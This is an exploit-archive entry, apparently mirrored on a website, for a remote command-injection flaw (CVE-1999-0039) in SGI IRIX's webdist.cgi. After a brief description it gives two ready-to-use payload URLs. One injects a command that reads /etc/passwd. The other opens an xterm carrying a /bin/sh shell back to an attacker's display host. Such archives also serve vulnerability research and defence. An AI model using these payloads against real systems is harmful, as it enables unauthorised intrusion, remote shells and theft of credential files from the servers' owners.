[] NeoSense
E X P L O I T S
title author type platform port cve id

SGI IRIX 6.3 - cgi-bin 'webdist.cgi' Command Execution

Author: anonymous
type: remote
platform: multiple
port: nan
date_added: 1997-05-06 
date_updated: 2017-11-22 
verified: 1 
codes: CVE-1999-0039;OSVDB-235 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/374/info


A vulnerability exists in the webdist.cgi program, as shipped by Silicon Grpahics Inc with the Irix operating system. This vulnerability will allow any remote user to execute arbitrary commands on an affected machine. Commands will be executed with the privileges of the httpd daemon.

/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

or

http://host/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.